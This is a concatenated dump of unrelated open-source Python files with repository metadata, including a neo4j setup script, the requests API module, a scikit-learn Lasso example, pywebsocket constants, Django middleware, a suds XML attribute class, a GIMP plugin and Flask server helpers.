# -*- mode: Python; coding: utf-8 -*- # Copyright (c) 2002-2013 "Neo Technology," # Network Engine for Objects in Lund AB [http://neotechnology.com] # # This file is part of Neo4j. # # Neo4j is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. #!/usr/bin/env python from distutils.core import setup with open('README.txt') as file: long_description = file.read() setup( name='neo4j-embedded', # This is auto-generated by the # maven build that runs this project version='${pythonic_version}', description='Bindings for the embedded version of the neo4j graph database.', long_description=long_description, author='Neo Technology', author_email='python@neotechnology.com', url='https://github.com/neo4j/python-embedded', packages=( 'neo4j', 'neo4j.javalib', ), install_requires=( 'setuptools', ), package_data = { # Include our java dependencies '': ['*.jar'], }, classifiers=( 'License :: OSI Approved :: GNU General Public License (GPL)', 'Topic :: Database :: Database Engines/Servers', 'Programming Language :: Python :: 2.7', 'Programming Language :: Java', ), )
gpl-3.0
gauribhoite/personfinder
rtd/lib/python2.7/site-packages/pip/_vendor/requests/api.py
435
5415
# -*- coding: utf-8 -*- """ requests.api ~~~~~~~~~~~~ This module implements the Requests API. :copyright: (c) 2012 by Kenneth Reitz. :license: Apache2, see LICENSE for more details. """ from . import sessions def request(method, url, **kwargs): """Constructs and sends a :class:`Request <Request>`. :param method: method for the new :class:`Request` object. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json data to send in the body of the :class:`Request`. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': ('filename', fileobj)}``) for multipart encoding upload. :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a (`connect timeout, read timeout <user/advanced.html#timeouts>`_) tuple. :type timeout: float or tuple :param allow_redirects: (optional) Boolean. Set to True if POST/PUT/DELETE redirect following is allowed. :type allow_redirects: bool :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy. :param verify: (optional) if ``True``, the SSL cert will be verified. A CA_BUNDLE path can also be provided. :param stream: (optional) if ``False``, the response content will be immediately downloaded. :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. :return: :class:`Response <Response>` object :rtype: requests.Response Usage:: >>> import requests >>> req = requests.request('GET', 'http://httpbin.org/get') <Response [200]> """ session = sessions.Session() response = session.request(method=method, url=url, **kwargs) # By explicitly closing the session, we avoid leaving sockets open which # can trigger a ResourceWarning in some cases, and look like a memory leak # in others. session.close() return response def get(url, params=None, **kwargs): """Sends a GET request. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault('allow_redirects', True) return request('get', url, params=params, **kwargs) def options(url, **kwargs): """Sends a OPTIONS request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault('allow_redirects', True) return request('options', url, **kwargs) def head(url, **kwargs): """Sends a HEAD request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault('allow_redirects', False) return request('head', url, **kwargs) def post(url, data=None, json=None, **kwargs): """Sends a POST request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json data to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request('post', url, data=data, json=json, **kwargs) def put(url, data=None, **kwargs): """Sends a PUT request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request('put', url, data=data, **kwargs) def patch(url, data=None, **kwargs): """Sends a PATCH request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request('patch', url, data=data, **kwargs) def delete(url, **kwargs): """Sends a DELETE request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request('delete', url, **kwargs)
apache-2.0
saiwing-yeung/scikit-learn
examples/linear_model/lasso_dense_vs_sparse_data.py
348
1862
""" ============================== Lasso on dense and sparse data ============================== We show that linear_model.Lasso provides the same results for dense and sparse data and that in the case of sparse data the speed is improved. """ print(__doc__) from time import time from scipy import sparse from scipy import linalg from sklearn.datasets.samples_generator import make_regression from sklearn.linear_model import Lasso ############################################################################### # The two Lasso implementations on Dense data print("--- Dense matrices") X, y = make_regression(n_samples=200, n_features=5000, random_state=0) X_sp = sparse.coo_matrix(X) alpha = 1 sparse_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=1000) dense_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=1000) t0 = time() sparse_lasso.fit(X_sp, y) print("Sparse Lasso done in %fs" % (time() - t0)) t0 = time() dense_lasso.fit(X, y) print("Dense Lasso done in %fs" % (time() - t0)) print("Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_ - dense_lasso.coef_)) ############################################################################### # The two Lasso implementations on Sparse data print("--- Sparse matrices") Xs = X.copy() Xs[Xs < 2.5] = 0.0 Xs = sparse.coo_matrix(Xs) Xs = Xs.tocsc() print("Matrix density : %s %%" % (Xs.nnz / float(X.size) * 100)) alpha = 0.1 sparse_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=10000) dense_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=10000) t0 = time() sparse_lasso.fit(Xs, y) print("Sparse Lasso done in %fs" % (time() - t0)) t0 = time() dense_lasso.fit(Xs.toarray(), y) print("Dense Lasso done in %fs" % (time() - t0)) print("Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_ - dense_lasso.coef_))
bsd-3-clause
yoava333/servo
tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/common.py
489
9947
# Copyright 2012, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """This file must not depend on any module specific to the WebSocket protocol. """ from mod_pywebsocket import http_header_util # Additional log level definitions. LOGLEVEL_FINE = 9 # Constants indicating WebSocket protocol version. VERSION_HIXIE75 = -1 VERSION_HYBI00 = 0 VERSION_HYBI01 = 1 VERSION_HYBI02 = 2 VERSION_HYBI03 = 2 VERSION_HYBI04 = 4 VERSION_HYBI05 = 5 VERSION_HYBI06 = 6 VERSION_HYBI07 = 7 VERSION_HYBI08 = 8 VERSION_HYBI09 = 8 VERSION_HYBI10 = 8 VERSION_HYBI11 = 8 VERSION_HYBI12 = 8 VERSION_HYBI13 = 13 VERSION_HYBI14 = 13 VERSION_HYBI15 = 13 VERSION_HYBI16 = 13 VERSION_HYBI17 = 13 # Constants indicating WebSocket protocol latest version. VERSION_HYBI_LATEST = VERSION_HYBI13 # Port numbers DEFAULT_WEB_SOCKET_PORT = 80 DEFAULT_WEB_SOCKET_SECURE_PORT = 443 # Schemes WEB_SOCKET_SCHEME = 'ws' WEB_SOCKET_SECURE_SCHEME = 'wss' # Frame opcodes defined in the spec. OPCODE_CONTINUATION = 0x0 OPCODE_TEXT = 0x1 OPCODE_BINARY = 0x2 OPCODE_CLOSE = 0x8 OPCODE_PING = 0x9 OPCODE_PONG = 0xa # UUIDs used by HyBi 04 and later opening handshake and frame masking. WEBSOCKET_ACCEPT_UUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' # Opening handshake header names and expected values. UPGRADE_HEADER = 'Upgrade' WEBSOCKET_UPGRADE_TYPE = 'websocket' WEBSOCKET_UPGRADE_TYPE_HIXIE75 = 'WebSocket' CONNECTION_HEADER = 'Connection' UPGRADE_CONNECTION_TYPE = 'Upgrade' HOST_HEADER = 'Host' ORIGIN_HEADER = 'Origin' SEC_WEBSOCKET_ORIGIN_HEADER = 'Sec-WebSocket-Origin' SEC_WEBSOCKET_KEY_HEADER = 'Sec-WebSocket-Key' SEC_WEBSOCKET_ACCEPT_HEADER = 'Sec-WebSocket-Accept' SEC_WEBSOCKET_VERSION_HEADER = 'Sec-WebSocket-Version' SEC_WEBSOCKET_PROTOCOL_HEADER = 'Sec-WebSocket-Protocol' SEC_WEBSOCKET_EXTENSIONS_HEADER = 'Sec-WebSocket-Extensions' SEC_WEBSOCKET_DRAFT_HEADER = 'Sec-WebSocket-Draft' SEC_WEBSOCKET_KEY1_HEADER = 'Sec-WebSocket-Key1' SEC_WEBSOCKET_KEY2_HEADER = 'Sec-WebSocket-Key2' SEC_WEBSOCKET_LOCATION_HEADER = 'Sec-WebSocket-Location' # Extensions DEFLATE_FRAME_EXTENSION = 'deflate-frame' PERMESSAGE_COMPRESSION_EXTENSION = 'permessage-compress' PERMESSAGE_DEFLATE_EXTENSION = 'permessage-deflate' X_WEBKIT_DEFLATE_FRAME_EXTENSION = 'x-webkit-deflate-frame' X_WEBKIT_PERMESSAGE_COMPRESSION_EXTENSION = 'x-webkit-permessage-compress' MUX_EXTENSION = 'mux_DO_NOT_USE' # Status codes # Code STATUS_NO_STATUS_RECEIVED, STATUS_ABNORMAL_CLOSURE, and # STATUS_TLS_HANDSHAKE are pseudo codes to indicate specific error cases. # Could not be used for codes in actual closing frames. # Application level errors must use codes in the range # STATUS_USER_REGISTERED_BASE to STATUS_USER_PRIVATE_MAX. The codes in the # range STATUS_USER_REGISTERED_BASE to STATUS_USER_REGISTERED_MAX are managed # by IANA. Usually application must define user protocol level errors in the # range STATUS_USER_PRIVATE_BASE to STATUS_USER_PRIVATE_MAX. STATUS_NORMAL_CLOSURE = 1000 STATUS_GOING_AWAY = 1001 STATUS_PROTOCOL_ERROR = 1002 STATUS_UNSUPPORTED_DATA = 1003 STATUS_NO_STATUS_RECEIVED = 1005 STATUS_ABNORMAL_CLOSURE = 1006 STATUS_INVALID_FRAME_PAYLOAD_DATA = 1007 STATUS_POLICY_VIOLATION = 1008 STATUS_MESSAGE_TOO_BIG = 1009 STATUS_MANDATORY_EXTENSION = 1010 STATUS_INTERNAL_ENDPOINT_ERROR = 1011 STATUS_TLS_HANDSHAKE = 1015 STATUS_USER_REGISTERED_BASE = 3000 STATUS_USER_REGISTERED_MAX = 3999 STATUS_USER_PRIVATE_BASE = 4000 STATUS_USER_PRIVATE_MAX = 4999 # Following definitions are aliases to keep compatibility. Applications must # not use these obsoleted definitions anymore. STATUS_NORMAL = STATUS_NORMAL_CLOSURE STATUS_UNSUPPORTED = STATUS_UNSUPPORTED_DATA STATUS_CODE_NOT_AVAILABLE = STATUS_NO_STATUS_RECEIVED STATUS_ABNORMAL_CLOSE = STATUS_ABNORMAL_CLOSURE STATUS_INVALID_FRAME_PAYLOAD = STATUS_INVALID_FRAME_PAYLOAD_DATA STATUS_MANDATORY_EXT = STATUS_MANDATORY_EXTENSION # HTTP status codes HTTP_STATUS_BAD_REQUEST = 400 HTTP_STATUS_FORBIDDEN = 403 HTTP_STATUS_NOT_FOUND = 404 def is_control_opcode(opcode): return (opcode >> 3) == 1 class ExtensionParameter(object): """Holds information about an extension which is exchanged on extension negotiation in opening handshake. """ def __init__(self, name): self._name = name # TODO(tyoshino): Change the data structure to more efficient one such # as dict when the spec changes to say like # - Parameter names must be unique # - The order of parameters is not significant self._parameters = [] def name(self): return self._name def add_parameter(self, name, value): self._parameters.append((name, value)) def get_parameters(self): return self._parameters def get_parameter_names(self): return [name for name, unused_value in self._parameters] def has_parameter(self, name): for param_name, param_value in self._parameters: if param_name == name: return True return False def get_parameter_value(self, name): for param_name, param_value in self._parameters: if param_name == name: return param_value class ExtensionParsingException(Exception): def __init__(self, name): super(ExtensionParsingException, self).__init__(name) def _parse_extension_param(state, definition): param_name = http_header_util.consume_token(state) if param_name is None: raise ExtensionParsingException('No valid parameter name found') http_header_util.consume_lwses(state) if not http_header_util.consume_string(state, '='): definition.add_parameter(param_name, None) return http_header_util.consume_lwses(state) # TODO(tyoshino): Add code to validate that parsed param_value is token param_value = http_header_util.consume_token_or_quoted_string(state) if param_value is None: raise ExtensionParsingException( 'No valid parameter value found on the right-hand side of ' 'parameter %r' % param_name) definition.add_parameter(param_name, param_value) def _parse_extension(state): extension_token = http_header_util.consume_token(state) if extension_token is None: return None extension = ExtensionParameter(extension_token) while True: http_header_util.consume_lwses(state) if not http_header_util.consume_string(state, ';'): break http_header_util.consume_lwses(state) try: _parse_extension_param(state, extension) except ExtensionParsingException, e: raise ExtensionParsingException( 'Failed to parse parameter for %r (%r)' % (extension_token, e)) return extension def parse_extensions(data): """Parses Sec-WebSocket-Extensions header value returns a list of ExtensionParameter objects. Leading LWSes must be trimmed. """ state = http_header_util.ParsingState(data) extension_list = [] while True: extension = _parse_extension(state) if extension is not None: extension_list.append(extension) http_header_util.consume_lwses(state) if http_header_util.peek(state) is None: break if not http_header_util.consume_string(state, ','): raise ExtensionParsingException( 'Failed to parse Sec-WebSocket-Extensions header: ' 'Expected a comma but found %r' % http_header_util.peek(state)) http_header_util.consume_lwses(state) if len(extension_list) == 0: raise ExtensionParsingException( 'No valid extension entry found') return extension_list def format_extension(extension): """Formats an ExtensionParameter object.""" formatted_params = [extension.name()] for param_name, param_value in extension.get_parameters(): if param_value is None: formatted_params.append(param_name) else: quoted_value = http_header_util.quote_if_necessary(param_value) formatted_params.append('%s=%s' % (param_name, quoted_value)) return '; '.join(formatted_params) def format_extensions(extension_list): """Formats a list of ExtensionParameter objects.""" formatted_extension_list = [] for extension in extension_list: formatted_extension_list.append(format_extension(extension)) return ', '.join(formatted_extension_list) # vi:sts=4 sw=4 et
mpl-2.0
feliperfranca/django-nonrel-example
djangotoolbox/middleware.py
85
2801
from django.conf import settings from django.http import HttpResponseRedirect from django.utils.cache import patch_cache_control LOGIN_REQUIRED_PREFIXES = getattr(settings, 'LOGIN_REQUIRED_PREFIXES', ()) NO_LOGIN_REQUIRED_PREFIXES = getattr(settings, 'NO_LOGIN_REQUIRED_PREFIXES', ()) ALLOWED_DOMAINS = getattr(settings, 'ALLOWED_DOMAINS', None) NON_REDIRECTED_PATHS = getattr(settings, 'NON_REDIRECTED_PATHS', ()) NON_REDIRECTED_BASE_PATHS = tuple(path.rstrip('/') + '/' for path in NON_REDIRECTED_PATHS) class LoginRequiredMiddleware(object): """ Redirects to login page if request path begins with a LOGIN_REQURED_PREFIXES prefix. You can also specify NO_LOGIN_REQUIRED_PREFIXES which take precedence. """ def process_request(self, request): for prefix in NO_LOGIN_REQUIRED_PREFIXES: if request.path.startswith(prefix): return None for prefix in LOGIN_REQUIRED_PREFIXES: if request.path.startswith(prefix) and \ not request.user.is_authenticated(): from django.contrib.auth.views import redirect_to_login return redirect_to_login(request.get_full_path()) return None class RedirectMiddleware(object): """ A static redirect middleware. Mostly useful for hosting providers that automatically setup an alternative domain for your website. You might not want anyone to access the site via those possibly well-known URLs. """ def process_request(self, request): host = request.get_host().split(':')[0] # Turn off redirects when in debug mode, running unit tests, or # when handling an App Engine cron job. if (settings.DEBUG or host == 'testserver' or not ALLOWED_DOMAINS or request.META.get('HTTP_X_APPENGINE_CRON') == 'true' or request.path.startswith('/_ah/') or request.path in NON_REDIRECTED_PATHS or request.path.startswith(NON_REDIRECTED_BASE_PATHS)): return if host not in settings.ALLOWED_DOMAINS: return HttpResponseRedirect('http://' + settings.ALLOWED_DOMAINS[0] + request.path) class NoHistoryCacheMiddleware(object): """ If user is authenticated we disable browser caching of pages in history. """ def process_response(self, request, response): if 'Expires' not in response and \ 'Cache-Control' not in response and \ hasattr(request, 'session') and \ request.user.is_authenticated(): patch_cache_control(response, no_store=True, no_cache=True, must_revalidate=True, max_age=0) return response
bsd-3-clause
wadobo/suds
suds/sax/attribute.py
1
5713
# This program is free software; you can redistribute it and/or modify # it under the terms of the (LGPL) GNU Lesser General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Library Lesser General Public License for more details at # ( http://www.gnu.org/licenses/lgpl.html ). # # You should have received a copy of the GNU Lesser General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # written by: Jeff Ortel ( jortel@redhat.com ) """ Provides XML I{attribute} classes. """ import suds.sax from logging import getLogger from suds import * from suds.sax import * from suds.sax.text import Text log = getLogger(__name__) class Attribute: """ An XML attribute object. @ivar parent: The node containing this attribute @type parent: L{element.Element} @ivar prefix: The I{optional} namespace prefix. @type prefix: str @ivar name: The I{unqualified} name of the attribute @type name: str @ivar value: The attribute's value @type value: str """ def __init__(self, name, value=None): """ @param name: The attribute's name with I{optional} namespace prefix. @type name: str @param value: The attribute's value @type value: str """ self.parent = None self.prefix, self.name = splitPrefix(name) self.setValue(value) def clone(self, parent=None): """ Clone this object. @param parent: The parent for the clone. @type parent: L{element.Element} @return: A copy of this object assigned to the new parent. @rtype: L{Attribute} """ a = Attribute(self.qname(), self.value) a.parent = parent return a def qname(self): """ Get the B{fully} qualified name of this attribute @return: The fully qualified name. @rtype: str """ if self.prefix is None: return self.name else: return ':'.join((self.prefix, self.name)) def setValue(self, value): """ Set the attributes value @param value: The new value (may be None) @type value: str @return: self @rtype: L{Attribute} """ if isinstance(value, Text): self.value = value else: self.value = Text(value) return self def getValue(self, default=Text('')): """ Get the attributes value with optional default. @param default: An optional value to be return when the attribute's has not been set. @type default: str @return: The attribute's value, or I{default} @rtype: L{Text} """ if self.hasText(): return self.value else: return default def hasText(self): """ Get whether the attribute has I{text} and that it is not an empty (zero length) string. @return: True when has I{text}. @rtype: boolean """ return ( self.value is not None and len(self.value) ) def namespace(self): """ Get the attributes namespace. This may either be the namespace defined by an optional prefix, or its parent's namespace. @return: The attribute's namespace @rtype: (I{prefix}, I{name}) """ if self.prefix is None: return Namespace.default else: return self.resolvePrefix(self.prefix) def resolvePrefix(self, prefix): """ Resolve the specified prefix to a known namespace. @param prefix: A declared prefix @type prefix: str @return: The namespace that has been mapped to I{prefix} @rtype: (I{prefix}, I{name}) """ ns = Namespace.default if self.parent is not None: ns = self.parent.resolvePrefix(prefix) return ns def match(self, name=None, ns=None): """ Match by (optional) name and/or (optional) namespace. @param name: The optional attribute tag name. @type name: str @param ns: An optional namespace. @type ns: (I{prefix}, I{name}) @return: True if matched. @rtype: boolean """ if name is None: byname = True else: byname = ( self.name == name ) if ns is None: byns = True else: byns = ( self.namespace()[1] == ns[1] ) return ( byname and byns ) def __eq__(self, rhs): """ equals operator """ return rhs is not None and \ isinstance(rhs, Attribute) and \ self.prefix == rhs.name and \ self.name == rhs.name def __repr__(self): """ get a string representation """ return \ 'attr (prefix=%s, name=%s, value=(%s))' %\ (self.prefix, self.name, self.value) def __str__(self): """ get an xml string representation """ return self.__unicode__() def __unicode__(self): """ get an xml string representation """ n = self.qname() if self.hasText(): v = self.value.escape() else: v = self.value return '%s="%s"' % (n, v)
lgpl-3.0
dotmagic/python-fu
random_shapes.py
1
3826
#!/usr/bin/env python # Random Shapes plugin for The Gimp 2.3.x # Written by Werner Hartnagel 2006/10/23 # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. from gimpfu import * import random class randomSVG: def __init__(self, svg_filename, width, height, interation, shape_position, palette_colors): self.filename = svg_filename self.interation = interation self.shape_position = shape_position self.palette_colors = palette_colors self.data = "<?xml version=\"1.0\" standalone=\"no\"?>\n" self.data+= "<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n" self.data+= "<svg width=\"%s\" height=\"%s\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\">\n\n" % (width, height) def get_random_command(self): comm = ["L", "T"] commid = random.randint(0,1) return str(comm[commid]) def get_random_color(self): colors = ["blue","yellow","lime","red","black","green"] colorid = random.randint(0,5) return "style=\"fill:%s\"" % colors[colorid] def get_random_palette_color(self): cur_palette = pdb.gimp_context_get_palette() max_colors = pdb.gimp_palette_get_info(cur_palette) random_number = random.randint(0,max_colors-1) random_color = pdb.gimp_palette_entry_get_color(cur_palette, random_number) return "style=\"fill: rgb(%.0f,%.0f,%.0f)\"" % (random_color.r*255, random_color.g*255, random_color.b*255) def addShape(self): path_data="M %i %i" % (random.randint(0,self.shape_position), random.randint(0,self.shape_position)) pdatacount=random.randint(5,20) if self.palette_colors: style = self.get_random_palette_color() else: style = self.get_random_color() for i in xrange(0,pdatacount): path_data+=" %s %i %i" % (self.get_random_command(), random.randint(0,self.shape_position), random.randint(0,self.shape_position)) self.data+= "<path d=\"%s\" %s/>\n" % (path_data, style) def __del__(self): self.data+="\n</svg>\n" f = open(self.filename, "w") f.write(self.data) f.close() def py_random_shapes(svg_filename, width, height, interation, shape_position, palette_colors): mySVG = randomSVG(svg_filename, width, height, interation, shape_position, palette_colors) for i in xrange(0,int(interation)): mySVG.addShape() del mySVG svgdata = pdb.gimp_file_load(svg_filename, svg_filename) # svgdata = pdb.file_svg_load(svg_filename, svg_filename, 72, 400, 400, 0) # svgdata = pdb.gimp_vectors_import_from_string disp1 = gimp.Display(svgdata) # Register with The Gimp register( "python_fu_random_shapes", "random Shapes", "Render a stand-alone Image with random Shapes", "Werner Hartnagel", "(c) 2006, Werner Hartnagel", "2006", "<Toolbox>/Xtns/Python-Fu/Patterns/Random Shapes", "", [ (PF_STRING, "svg_filename", "Filename to export", "/tmp/randomshapes.svg"), (PF_INT32, "width", "Width ", 400), (PF_INT32, "height", "Height ", 400), (PF_SPINNER, "interation", "How many Shapes? ", 80, (1, 1000, 1)), (PF_SPINNER, "shape_position", "max. Shape Position ", 400, (10, 4000, 1)), (PF_TOGGLE, "palette_colors", "Use Colors from current Palette ", 1), ], [], py_random_shapes) main()
gpl-2.0
brettatoms/flask-appconfig
flask_appconfig/server_backends.py
1
1415
from multiprocessing import cpu_count import socket DEFAULT = 'tornado,werkzeug-threaded,werkzeug' def _get_cpu_count(): try: return cpu_count() except NotImplementedError: raise RuntimeError('Could not determine CPU count and no ' '--instance-count supplied.') def werkzeug_threaded(app, hostname, port): return _run_werkzeug(app, hostname, port, processes=1, threaded=False) def werkzeug(app, hostname, port): return _run_werkzeug(app, hostname, port, processes=_get_cpu_count(), threaded=False) def _run_werkzeug(app, hostname, port, **kwargs): try: app.run(hostname, port, debug=False, use_evalex=False, **kwargs) return True except socket.error as e: if not port < 1024 or e.errno != 13: raise # helpful message when trying to run on port 80 without room # permissions raise RuntimeError('Could not open socket on {}:{}: {}. ' 'Do you have root permissions?' .format(hostname, port, e)) def tornado(app, hostname, port): from tornado.wsgi import WSGIContainer from tornado.httpserver import HTTPServer from tornado.ioloop import IOLoop http_server = HTTPServer(WSGIContainer(app)) http_server.listen(port, address=hostname) IOLoop.instance().start() return True
mit
sillsdev/DblMetaData
Xmlpp/setup.py
1
2309
#!/usr/local/bin/python # coding: utf-8 from distutils.core import setup import py2exe import sys # If run without args, build executables, in quiet mode. if len(sys.argv) == 1: sys.argv.append("py2exe") sys.argv.append("-q") class Target: def __init__(self, **kw): self.__dict__.update(kw) # for the versioninfo resources self.version = "0.1.0" self.company_name = "SIL International" self.copyright = "©2012 Greg Trihus" self.name = "Xml pretty print" ################################################################ # A program using wxPython # The manifest will be inserted as resource into test_wx.exe. This # gives the controls the Windows XP appearance (if run on XP ;-) # # Another option would be to store it in a file named # test_wx.exe.manifest, and copy it with the data_files option into # the dist-dir. # manifest_template = ''' <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="5.0.0.0" processorArchitecture="x86" name="%(prog)s" type="win32" /> <description>%(prog)s Program</description> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly> ''' RT_MANIFEST = 24 TargDesc = Target( # used for the versioninfo resource description = "Pretty print xml file", # what to build script = "Xmlpp.py", other_resources = [(RT_MANIFEST, 1, manifest_template % dict(prog="Xmlpp"))], icon_resources = [(1, "UNPAK.ico")], dest_base = "Xmlpp") ################################################################ setup( options = {"py2exe": {"compressed":1, "optimize":2, "ascii": 1, "bundle_files": 1, "packages":["encodings"]}}, zipfile = None, console=[TargDesc], scripts = ['Xmlpp.py'], )
mit
gioman/QGIS
cmake/FindSIP.py
44
2287
# -*- coding: utf-8 -*- # # Copyright (c) 2007, Simon Edwards <simon@simonzone.com> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the Simon Edwards <simon@simonzone.com> nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY Simon Edwards <simon@simonzone.com> ''AS IS'' AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL Simon Edwards <simon@simonzone.com> BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # FindSIP.py # Copyright (c) 2007, Simon Edwards <simon@simonzone.com> # Redistribution and use is allowed according to the terms of the BSD license. # For details see the accompanying COPYING-CMAKE-SCRIPTS file. import sipconfig sipcfg = sipconfig.Configuration() print("sip_version:%06.0x" % sipcfg.sip_version) print("sip_version_num:%d" % sipcfg.sip_version) print("sip_version_str:%s" % sipcfg.sip_version_str) print("sip_bin:%s" % sipcfg.sip_bin) print("default_sip_dir:%s" % sipcfg.default_sip_dir) print("sip_inc_dir:%s" % sipcfg.sip_inc_dir) print("sip_mod_dir:%s" % sipcfg.sip_mod_dir)
gpl-2.0
aledionigi/trading-with-python
sandbox/spreadGroup.py
78
1891
